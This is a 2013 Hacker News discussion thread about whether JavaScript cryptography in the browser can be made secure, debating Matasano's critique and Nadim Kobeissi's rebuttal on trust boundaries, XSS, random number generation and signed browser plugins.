Hacker News new | past | comments | ask | show | jobs | submit login
Thoughts on Matasano Security’s Critique of Javascript Cryptography (nadim.cc)
52 points by dmix on May 25, 2013 | hide | past | favorite | 56 comments



> “JavaScript lacks a secure random number generator.”

> This is in fact not the case. window.crypto.getRandomValues() is a secure random number generator available in JavaScript, and supported by major web browsers

That url points to a page that has a big green warning.

"This is an experimental technology Because this technology's specification has not stabilized, check the compatibility table for the proper prefixes to use in various browsers. Also note that the syntax and behavior of an experimental technology is subject to change in future versions of browsers as the spec changes."

Note that having a PRNG available doesn't mean it's being used properly. (See Debian and OpenSSL)


In the footer it also says that neither IE nor Opera support the feature, and Firefox only added it in version 21, which was released less than two weeks ago.


This post is technically correct in that Javascript could be used as the implementation language for a cryptography implementation distributed as a signed browser plugin[1]. However, that's really not the point - if you're going to have to distribute a browser extension/plugin anyway you could equally well use ActiveX (as is used for successful crypto implementations in East Asia) or the netscape plugin API and use whatever implementation language you like. The original critique was really talking about "Javascript cryptography" in the sense of "in-browser cryptography using javascript loaded the normal way browsers load it", which is and remains fundamentally broken.

[1] Although even then there are issues - e.g. with an interpreted/JITed language like javascript it becomes very hard to avoid timing attacks)


Although we wrote this article informally in 2011, we stand behind it in 2013. I'd also add, in case Nadim was wondering who reads info@matasano.com, that I'm a Matasano founder and not an employee.

Don't build cryptographic features using browser Javascript.


I can't wait until they get the flaws in JavaScript crypto ironed out so my "pure" Excel AES implementation can reign supreme as the worst implementation of a cryptographic primitive ever.


That's not going to happen: I endorse your Excel AES implementation immediately. If a pure spreadsheet AES works for your project, go ahead and use it!


This is in fact not the case. window.crypto.getRandomValues() is a secure random number generator available in JavaScript, and supported by major web browsers.

Ironically, the page he's linking to mentions that the function is an experimental technology and the specification has yet to be stable.


Feynman's Cargo Cult Science talk is relevant here. (http://www.lhup.edu/~DSIMANEK/cargocul.htm)

> But there is one feature I notice that is generally missing in cargo cult science. That is the idea that we all hope you have learned in studying science in school--we never explicitly say what this is, but just hope that you catch on by all the examples of scientific investigation. It is interesting, therefore, to bring it out now and speak of it explicitly. It's a kind of scientific integrity, a principle of scientific thought that corresponds to a kind of utter honesty--a kind of leaning over backwards. For example, if you're doing an experiment, you should report everything that you think might make it invalid--not only what you think is right about it: other causes that could possibly explain your results; and things you thought of that you've eliminated by some other experiment, and how they worked--to make sure the other fellow can tell they have been eliminated.

> Details that could throw doubt on your interpretation must be given, if you know them. You must do the best you can--if you know anything at all wrong, or possibly wrong--to explain it. If you make a theory, for example, and advertise it, or put it out, then you must also put down all the facts that disagree with it, as well as those that agree with it. There is also a more subtle problem. When you have put a lot of ideas together to make an elaborate theory, you want to make sure, when explaining what it fits, that those things it fits are not just the things that gave you the idea for the theory; but that the finished theory makes something else come out right, in addition.

It's the same for crypto. This is where all the "don't roll your own" stuff comes from. Use stuff that other people have built, and other people have poked at.

Many people say that Javascript crypto is a bad idea. Considering the fact that people use cryptography to avoid being shot in the head by their oppressive government it seems irresponsible to dismiss any concerns about javascript crypto without doing rigorous testing.


The worst problem nowadays is how to make sure that your HTTPS connection is not MITMed.

For most low to medium risk profiles HTTPS is safe enough. However in these cases in-browser encryption is rarely needed. For the threat model applications like Cryptocat faces, the danger for a targeted attack by someone with access to the CA infrastructure is not negligible.

So if can trust the server with your data, you don't need JS cryptology. If you can't trust the server, how can you trust the JS it sends?


> If you can't trust the server, how can you trust the JS it sends?

This is the fundamental issue here. The trust model is purely, irrevocably broken. This isn't something you can paper over.


> So if can trust the server with your data, you don't need JS cryptology. If you can't trust the server, how can you trust the JS it sends?

He address that with using chrome plugins and code verifiers. Not the ideal or most convenient solution obviously.

But you also can't assume the JS is hosted and delivered by the same server the data is being transmitted through. JS is extremely portable.


> He address that with using plugins and verifiers. Not the ideal solution obviously.

As noted in the second point of my response in the root of the thread, this isn't just a non-ideal solution, it's a non-solution. It doesn't solve the trust boundary issues inherent here.


Aren't those trust boundary issues also present in every other piece of downloadable software, such as Tor for example? When you download a signed plugin, what's the difference from downloading Tor?


In theory, yes. There's nothing inherently more secure about Tor than an app running in the browser. However, XSS attacks are everywhere, it's trivial for servers to shoot code down to the client to evaluate, etc. In practice, an app doing crypto on your desktop is fundamentally very different from a web app doing it, even if that's signed and isolated.


Okay. But XSS is class of bugs that has nothing to do with code delivery, and that is quite possible to mitigate. So overall, the problem of code delivery is still addressed to a notable (if not complete) extent with the use of downloadable signed browser apps.


Huh? Maybe I misunderstand what you're going on about, but if you can XSS in javascript, you can certainly change the meaning of even signed code - just hijack Object.prototype.constructor or similar.


That may very well be the case, but isn't this a solvable problem? Just like apps made in C need to be protected against buffer overflows, apps made in JS need to be protected against XSS. Both are reasonable threats that can be mitigated.


Consider the fact that XSS is some other part of the application that the reviewed crypto plugin JS is part of has an XSS in it.

Yes, but just because it can be mitigated doesn't mean that it is mitigated.


> Yes, but just because it can be mitigated doesn't mean that it is mitigated.

Sure, but I just want to point to the fact that this is a solvable problem. A lot of people talk as if it is some sort of insurmountable obstacle, whereas I think responsible programmers can solve it and move on.


You're arguing for a theoretical world, we're arguing from a practical one. I've spent enough time down in the trenches finding attacks in extremely well-reviewed code, that adding a massive new attack surface is not a thrilling proposition.


Well, I guess you're just slightly more pessimistic and I'm slightly more optimistic. I respect your viewpoint, though. :-)


I'm a really optimistic type, really. Optimistic to the annoyance of some people. But in the case of security and cryptology there does not exist a choice between optimism and pessimism, but a choice between sharp eyed paranoia and wilful ignorance.

A defence is always only as strong as the weakest link, and an attacker usually has all the time in the world to find and exploit it.

Optimism has no place here.


The smiley face in that comment is doing a lot of work.


In the context of the GP (attack by someone with access to the CA infrastructure) you can't trust "signed" plugins either.


i could bother to read what nadim has written, but then i would fall in the "successfully trolled" bucket. i consider daeken very kind for reading and systematically disassembling nadim's post. instead, i will make a few rude blanket statements.

- having a misleading wired article (or several) written about you in no way qualifies you as an expert on cryptography. anyone who has any level of knowledge in the subject knows this guy is a total hack.

- everything that is somewhat correct about his products is due to people who _actually_ know stuff about cryptography telling him "no, no, no, you need to do X". the entirety of the architecture is effectively crowd-sourced. people telling you how to be a good carpenter is no substitute for being a skilled woodworker.

- nadim should stop making crypto products because bad crypto _puts people at risk_. if you make one bad product, i can see chalking it up to "well, at least he's trying". instead, nadim has routinely and repeatedly demonstrated his lack of real domain knowledge.

i suggest nadim make some turd-like web 2.0/3.0 driven product where security doesn't matter. he clearly has the tenacity to code but lacks the intelligence and domain knowledge to make security-related software.


It seems to me that a fundamental problem in all software security systems is that you cannot necessarily trust the location where the software is deployed. Javascript has issues here, but I think it's a mistake to claim that anything but the instances of those issues is unique to javascript.

If you do not know if your system is already compromised, you cannot guarantee that using your system is without risk. And that's even before we get to people willing to break down doors and other such nastiness.

That said, these are not "crypto flaws" - these are flaws that exist in systems even if the math of the cryptography is perfect.

That said, there's something to be said for interacting with other people. And focusing on security risks while ignoring denial of access risks seems silly.

Anyways, my reading of the people writing here suggests to me that almost no one here is really serious about security. There's too much focus on trash talk and struggles with properly characterizing a now-non-existant version of a blog page not enough focus on useful security mechanisms for me to have learned anything useful.

One thing to keep in mind, though: everything that happens on the internet has visibility. So if some code is advertised as stable and it changes from day to day? Something is wrong. Similarly if I download the same code from two different machines and I get something different for supposedly stable code, something is wrong...

And, one of the nice things about open source browsers is that - hypothetically at least - anyone can take the browser and build it for themselves, with their own monitoring and tracking code. This can take time, and modern browsers seem to be updated almost as fast as they can be built, but they do seem to have internal APIs which are rather stable. (Other approaches are also possible - what I am describing here is an off-the-cuff variant tailored at some of the risk suggestion raised in other posts on the page where I am responding...)

Grey boxes and human readable documentation for the win...


So, first it should be noted that this critique (and the original article) are from 2011. Not a lot has changed since then, but it's worth noting. Secondly, I'm an ex-Matasano employee and still friends with tptacek et al; just throwing my potential biases out on the table.

Now, I don't agree with every single bit of the original article, but I disagree with just about every bit of this one. I'll go point by point.

>> “Any attacker who could swipe an unencrypted secret can, with almost total certainty, intercept and alter a web request.”

> This problem is simply mitigated by deploying Javascript cryptography in conjunction with HTTPS.

No, it's really not mitigated by doing so. Because the crypto code is coming from the server you're attempting to prevent cleartext access to, the trust model is fundamentally broken here. The server could easily throw down JS code that does not perform proper crypto operations, leaks keys, or any number of other things. And that's not even speaking of XSS and other attacks making it trivial for an attacker to compromise your data.

Edit (based on edited OP): > [...] it is possible to deliver web apps as signed, local browser plugins, applications and extensions. This greatly helps with solving the problem.

Correct, this does mitigate some of the issue. Namely, it allows the code to be reviewed as it is in use. However, the server can still push code arbitrarily and completely compromise the crypto, and XSS is still an issue.

>> “Secure delivery of Javascript to browsers is a chicken-egg problem.”

> This problem, while serious, can be mitigated with the usage of browser plugins that locally verify the integrity of the Javascript code, warning the user should the code be faulty.

This is correct...ish. The problem is that it still gives too much trust to the server. The proper approach would be a browser plugin that exposes a Keyczar-style, high-level interface to JS crypto and allows secure operations on data without revealing access to the server.

However, this still isn't enough. Take the case of Gmail adding GPG support for emails. Let's assume you have a perfectly secure plugin such as one I described above. Even in this case, the server-driven JS still could send unencrypted data from the DOM up to the server, before crypto operations have happened. The trust boundaries are nonexistent here.

>> “Javascript lacks a secure random number generator.”

> While Javascript does not ship with a secure random number generator, [...]

Let's just stop here. Doing a CSPRNG right is hard. Very, very hard. Thankfully, browsers are starting to implement this as part of the browser directly, making it much less likely that JS code can skew results. This should be a solved problem soon, if it isn't already.

Edit (based on edited OP): They now mention the CSPRNG built into modern browsers. As mentioned, this is 99% a solved problem.

>> “Javascript cryptography hasn’t implemented well-known standards such as PGP; such a high-level language can’t be trusted with cryptography.”

This is one point from the original article that I think is specious. If you have the proper lego blocks, you should be able to put together things like PGP securely. But those blocks don't exist.

> However, the ultimate problem with browser cryptography is that there is no standard for innate, in-browser encryption. Very much like HTML5 and CSS, there needs to be an international, vetted, audited, cross-browser standard for browsers to be capable of securely encrypting and communicating sensitive information. There’s no denying the urgent need for such a standard , considering the ridiculous rate in which the browser is becoming pretty much the mainstream central command for personal information.

This I agree with. However, every approach so far has really, really, really sucked. See also: https://news.ycombinator.com/item?id=4549504

To do this properly, we need a standard for high-level crypto operations, which is incredibly hard to pull off, and we need sane trust boundaries to prevent the server from skewing operations and stealing data. I hope someone will get it right eventually.

Edit: Forgot to respond to one point.

>> “JavaScript’s ‘view-source transparency’ is illusory.”

> It is the case in every cryptography implementation that the implementation will need to be reviewed by an expert before being declared secure. This is no different in JavaScript, C, or Python.

There are a few issues here:

1) Generally speaking, the fact that JS source is pushed down on every access means that there's no way for you to actually review it.

2) Even if the crypto code is isolated and completely reviewed and found to be bulletproof, the trust boundaries are still screwed. C.f. the Gmail example above.


>The server could easily throw down JS code that does not perform proper crypto operations, leaks keys, or any number of other things.

(Not a legal advice, consult an attorney before following anything in this post).

There is important difference between "server could send malicious javascript" and "server does send malicious javascript". This difference becomes important when you consider the legal definition of the word "possession" - a service provider could be compelled (e.g. by a discovery request) to disclose information that he has in his possession, but he cannot be compelled to disclose information that he does not have. Information encrypted in-browser before the data is sent to the server is legally never in possession of the service provider, whereas information that is sent to the server to be encrypted is legally in possession for that brief moment, and therefore is subject to being disclosed.

In an imaginary black-and-white world only the CIA-types with the torture tools and secret jails comes after the data, and they can compel the service provider to send malicious javascript to harvest the secret if they want to. In the real shades-of-gray world there are tons of people who want to get access to someone else's data and who have to abide by the law to do that.


I'm not so sure about that. See for example hushmail in 2007: http://www.wired.com/threatlevel/2007/11/encrypted-e-mai/

While with this specific case here they intercepted the passphrase server-side, they specifically hinted that it wouldn't have made a difference with their java applet.

"The extra security given by the Java applet is not particularly relevant, in the practical sense, if an individual account is targeted"


Reading preceding paragraph to the phrase you quoted, the context implies to me they discuss whether architecture prevents hushmail from bugging java applet (it does not). They do not talk about whether they can be legally compelled to do so.


In the vast majority of cases, governments are not your adversary, or are very far down the list of priorities. They may have to follow the law, but the majority of other adversaries don't; that's why we are concerned about XSS, buffer overflows, and all other attacks against implementation flaws.

That said: yes, bad crypto will defend against government 'attacks' as well as good crypto will, if you assume they're going to play by your rules. But it's still better to do it the right way.


I don't think you understood my post at all.

My point is that adding in-browser crypto to a web app (https-only site, no external resources loaded, yada yada) has substantial impact on whether the information is disclosed or not in the end, in particular when we are talking about legally compelled disclosure.

Do you agree or not?


I agree only in the case of a legally-compelled disclosure. For all other cases, there are a million simple means by which you can break it.


> Correct, this does mitigate some of the issue. Namely, it allows the code to be reviewed as it is in use. However, the server can still push code arbitrarily and completely compromise the crypto, and XSS is still an issue.

You're wrong. If a JavaScript app is structured properly, especially one delivered as a signed browser plugin, it can run completely client-side with no capability to _execute_ remote JavaScript code from a server whatsoever.

Simply executing and parsing XMLHttpRequests does not mean that the JS app is executing arbitrary code from a remote server. It may simply be parsing JSON payloads. This is completely up to whatever code is delivered as part of the browser add-on, and cannot be remotely overridden by the server.

You are correct that XSS is an issue, but as mentioned elsewhere, so are buffer overflow attacks in compiled code. Any crypto implementation will have "issues" that need to be engineered around. That's the purpose of independent review and open source code.

The original claim by the Matasano article was that JS crypto is "doomed," which I believe is patently false linkbait. While no one would agree that JS crypto is "ideal," I believe Nadim has raised very good arguments to say that, at the very least, it can be done properly.


We have better ways of baiting links than telling generalist software developers things they don't want to hear about cryptography.

http://www.matasano.com/articles/crypto-challenges/


May your SEO be blessed.


We have mesothelioma and car insurance meta tags, but they're encrypted in such a way that you can only see them if you finish all 48 challenges. Why not sign up and see how you do?


Done. This should be fun :)


First set should be in your inbox. Good luck! It starts out simple.


In a perfect world, you're absolutely right. In practice, you couldn't be more wrong.

> You're wrong. If a JavaScript app is structured properly, especially one delivered as a signed browser plugin, it can run completely client-side with no capability to _execute_ remote JavaScript code from a server whatsoever.

It is absolutely possible to engineer an application in that way, but that is not how the vast, vast, vast majority of applications work. Most of them throw data straight into the DOM, they include scripts from the server, etc, etc. It's possible to do this right, but I rarely see it.

> You are correct that XSS is an issue, but as mentioned elsewhere, so are buffer overflow attacks in compiled code. Any crypto implementation will have "issues" that need to be engineered around. That's the purpose of independent review and open source code.

XSS is easy to find, easy to exploit, and exists everywhere in real-world web apps. This is comparing the danger of a car heading towards you at 200mph to a baby coming towards you in a stroller. They're just worlds apart.

At the end of the day, nearly every single web application I've tested (hundreds, if not thousands) has fallen to the same issues. This trend hasn't changed, and I don't expect it to do so any time soon.


Matasano's claim is that JavaScript is fundamentally "doomed" for crypto. You are saying that it is possible to engineer a JS crypto app properly, but almost nobody does.

There's a big difference between a technology being fundamentally broken and engineers simply not using it correctly.

This same sort of problem applied to PHP years ago. The default behavior of the language made it easy to write horribly insecure code, and many developers did. But it has always been possible to engineer a PHP app in a secure manner. You just had to work a bit harder at it in the past.

You are absolutely correct that most people don't write secure JS code today. But the web is an evolving platform, and as standards and engineering awareness improve, this will change.

The need for better in-browser crypto standards is clear. In spite of this, Nadim has proved that it is possible to build secure JS apps today. It is specious to simply dismiss his contributions because most other engineers don't write secure code.


I agree with you that JavaScript crypto is dubious in many applications, but as a note, I believe that HTML/JavaScript makes a good cross platform application platform that, due to the lack of difficult to reproduce compile steps, has the potential to provide increased security over traditional applications. In particular, it should be possible for something like a Chrome application to not update until it has received signatures of the source code itself from multiple trusted sources who have supposedly reviewed the code, which, while not perfect of course, is better than the usual model for native applications. That's one of a few reasons that the Web Crypto standard should be encouraged, IMO.


Although I think the API itself has a severely misguided design, the concept underlying the Web Crypto standard is a good one, and I agree it's worth encouraging.

Of course, the post we wrote in 2011, years before Web Crypto, agrees with you too.


> Generally speaking, the fact that JS source is pushed down on every access means that there's no way for you to actually review it.

The blog post says that it is necessary for code to be loaded as a local, signed browser plugin. This does not make JS source pushed down on every access.

> Even in this case, the server-driven JS still could send unencrypted data from the DOM up to the server, before crypto operations have happened. The trust boundaries are nonexistent here.

Why? A well-programmed JS app could simply tightly control all data received from the server and prevent insecure data parsing. It's totally possible, why isn't it considered?


> The blog post says that it is necessary for code to be loaded as a local, signed browser plugin. This does not make JS source pushed down on every access.

When this response was written, the blog post said nothing of the sort. In fact, in that point the text has not been changed whatsoever.

> Why? A well-programmed JS app could simply tightly control all data received from the server and prevent insecure data parsing. It's totally possible, why isn't it considered?

I'm speaking of an adversarial environment where the server is seen as an untrusted peer (hence the need for client-side crypto above SSL). The reason it's not considered is simple: servers get owned, services change their minds on issues, and people screw up. While it is theoretically possible to accomplish secure client-side crypto given enough constraints, this does not map well to reality.


> When this response was written, the blog post said nothing of the sort. In fact, in that point the text has not been changed whatsoever.

Allow me to quote from the blog post: "In fact, I believe that it is necessary to deliver JavaScript cryptography-using webapps as signed browser extensions, as any other method of delivery is too vulnerable to man-in-the-middle attacks to be considered secure."

> While it is theoretically possible to accomplish secure client-side crypto given enough constraints, this does not map well to reality.

Well, in my case, we got our browser plugin audited by Veracode and things worked out.


> Allow me to quote from the blog post

As I said, that point (the one you quoted me on originally) does not make mention of signing, and the quote you gave there did not exist when I wrote the comment, as you well know. This is silliness of the highest order.

> Well, in my case, we got our browser plugin audited by Veracode and things worked out.

"Things work out" until they don't. As a fellow security professional, you should know as well as I do: no matter how many audits you do, you're still fucking something up, and someone will find it if it's valuable enough to do so. This is as true of your code as it is mine or anyone else's.


The blog post was updated to reflect post-2011 reality right before you posted this comment. You should give it a re-read.


Only change seems to be a reference to the W3C Web Cryptography Working Group. Which is a bit funny, since that's who pushed the draft referenced in the HN thread I linked (the one I said was horribly broken).

Edit: Magikarp is correct, there are several other changes. I'll annotate my post as needed. Done.


There are actually other changes. I recommend you re-read the post.

Edit: Thank you for re-reading! :-)


Is there any chance you'd be willing to throw up the original post somewhere? It'd be nice to have along side my points for comparison purposes, just because it's changed so much. If not, that's cool.


I don't think I have it anymore. I didn't save a copy.


Well, the wayback machine is your friend. http://web.archive.org/web/20111001124736/http://log.nadim.c...


Seems pretty straightforward: If you trust the server, then HTTPS is sufficient. If you don't trust the server, then you shouldn't be doing anything sensitive in the browser. If you ever see the decrypted data, then obviously it's there in plain text on the page, and the server can just snap it out with one line of jQuery.


Without going into the technical details described by other commenters here, this is my understanding of the problem (please correct me if I'm wrong): You receive the code that is run, from the same entity you should be protecting yourself from -- that being the Cryptocat server. This is a big contradiction.

One really should assume that if a service can be compelled to act against the interests of its users, that will eventually happen.


Some people are happy letting their ego be in the driver's seat, and they do pay a price for it.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: